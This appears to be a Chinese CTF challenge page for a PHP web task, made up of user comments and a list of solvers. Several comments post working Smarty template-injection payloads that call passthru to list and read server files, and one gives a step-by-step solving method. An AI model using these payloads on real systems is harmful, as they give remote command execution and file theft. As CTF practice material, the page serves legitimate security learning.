聪明的phpWEB 未解决

分数: 25 金币: 2
题目作者: midi
一  血: Lazzaro
一血奖励: 3金币
解  决: 4176
提  示:
描  述:
聪明的php
评论
灵梦归希 28天前

这道题可以加大难度的。把_14781改为flag.txt就可以了.只是套一层娃而已

回复 0

icyskin 2月前

http://160.202.254.160:17350/?key={{passthru(%27tail%20-100%20/_14781%27)}}

回复 0

fuhaiyan 8月前

?a={{passthru('more ../../../*|grep fla')}}

回复 4

对对对对对对对对 9月前

?key={{passthru(%27tac%20/_4427%27)}}

回复 0

anony 1年前

flag{********}

回复 0

人闲桂花落 1年前

tac命令读取也可

回复 0

docker0w 2年前

1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获

回复 4

bx33661 2年前

?key={passthru("tac%20/_28710")}

回复 0

yun20231227 2年前

?key={{passthru('ls /')}}

回复 1

xinkuang 2年前

http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}

回复 1

WriteUp

image
midi

3 金币

评分(13)

解题动态

serena7780 攻破了该题 2小时前
willow 攻破了该题 4小时前
所以flag在哪? 攻破了该题 4小时前
CyberX 攻破了该题 1天前
yyss 攻破了该题 1天前
wuzhouwo 攻破了该题 1天前
耶无忧 攻破了该题 2天前
xianbuxianxi 攻破了该题 4天前
farsight 攻破了该题 7天前
miroy 攻破了该题 7天前
wjiarui 攻破了该题 8天前
no or yes 攻破了该题 9天前
shellbei 攻破了该题 10天前
fakedam 攻破了该题 10天前
布蕾脆脆奶芙 攻破了该题 10天前
假若今夜来临 攻破了该题 11天前
Turbo_Lonely 攻破了该题 12天前
关山月 攻破了该题 14天前
TryShallow 攻破了该题 15天前
whshkdh 攻破了该题 17天前
问题反馈